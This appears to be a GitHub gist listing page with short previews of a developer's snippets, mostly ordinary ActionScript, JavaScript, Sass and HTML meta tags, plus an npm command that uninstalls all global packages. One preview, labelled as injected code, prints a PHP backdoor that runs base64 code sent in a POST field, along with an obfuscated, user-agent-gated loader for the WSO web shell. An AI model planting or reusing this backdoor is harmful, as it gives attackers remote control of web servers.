⌘T | go to file |
⌘⌃P | go to project |
⌘R | go to methods |
⌃G | go to line |
⌘KB | toggle side bar |
⌘⇧P | command prompt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.boyajian.ui | |
{ | |
import com.greensock.TweenLite; | |
import flash.display.DisplayObject; | |
import flash.display.DisplayObjectContainer; | |
import flash.display.Sprite; | |
import flash.display.Stage; | |
import flash.events.Event; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var globals = { | |
settings : { | |
TEMPLATE_DEBUG : true | |
}, | |
USE_LOCAL_JSON : true, | |
STATIC_URL : "static/", | |
SCHEDULE_FEED_URL : ( !this.USE_LOCAL_JSON ? "feed/schedule/" : "static/json/schedule.json"), |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
npm list -g | awk '/@/ {print $2}' | grep '@' | awk -F@ '{print $1}' | xargs npm -g uninstall |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
<plist version="1.0"> | |
<dict> | |
<key>content</key> | |
<string>@extend %$0;</string> | |
<key>name</key> | |
<string>% Shortcut to Placeholder</string> | |
<key>scope</key> | |
<string>source.scss</string> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@mixin animation($animation, $animation-2: none, $animation-3: none) { | |
@each $prefix in webkit, moz, ms { | |
#{""}-#{$prefix}-animation: $animation, $animation-2, $animation-3; | |
} | |
} | |
@mixin animation-name($name) { | |
@include experimental(animation-name, $name); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
getImageURLS : function () { | |
var images = [], | |
key = {}, | |
tags = document.getElementsByTagName('*'), | |
url, | |
el; | |
for (var i = 0, len = tags.length; i < len; i++) { | |
el = tags[i]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// iOS Media Queries | |
// Goal: capture styles for iPhone, iPhone 3G, iPhone 3GS, iPhone 4, iPhone 4S, iPad, and iPad 2 | |
// | |
// Author: Tony Schneider (@tonywok) | |
// Please tell me where I fail. :) | |
// iPhone v(4,4S) portrait | |
// test: black text (overwritten by v* portrait) with blue background | |
@media all and (-webkit-min-device-pixel-ratio: 2) and (orientation: portrait) { | |
a { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Injected VIA | |
<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?> | |
<?php | |
$ref = $_SERVER['HTTP_USER_AGENT']; | |
$keywordsRegex = "/AtOPvMzpDosdPDlkm3ZmPzxoP/i"; | |
if (preg_match($keywordsRegex, $ref)) { | |
$a='bas'.'e6'.'4_d'.'ecode';eval($a("QGluaV9zZXQoJ2Vycm9yX2xvZycsTlVMTCk7DQpAaW5pX3NldCgnbG9nX2Vycm9ycycsMCk7DQpA | |
aW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywwKTsNCkBzZXRfdGltZV9saW1pdCgwKTsNCkBz | |
ZXRfbWFnaWNfcXVvdGVzX3J1bnRpbWUoMCk7DQpAZGVmaW5lKCdXU09fVkVSU0lPTicsICcyLjUn | |
KTsNCg0KaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSkgew0KCWZ1bmN0aW9uIFdTT3N0cmlwc2xh |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<meta name="twitter:card" content="player"> | |
<meta name="twitter:site" content="@jdeagle"> | |
<meta name="twitter:url" content="http://jamesdeagle.com"> | |
<meta name="twitter:title" content="The Streets is here"> | |
<meta name="twitter:description" content="Some quality tricks right here"> | |
<meta name="twitter:image" content="http://placekitten.com/500/500"> | |
<meta name="twitter:player" content="https://www.youtube.com/embed/PhWj3xDWrfE"> | |
<meta name="twitter:player:width" content="435"> | |
<meta name="twitter:player:height" content="251"> |
OlderNewer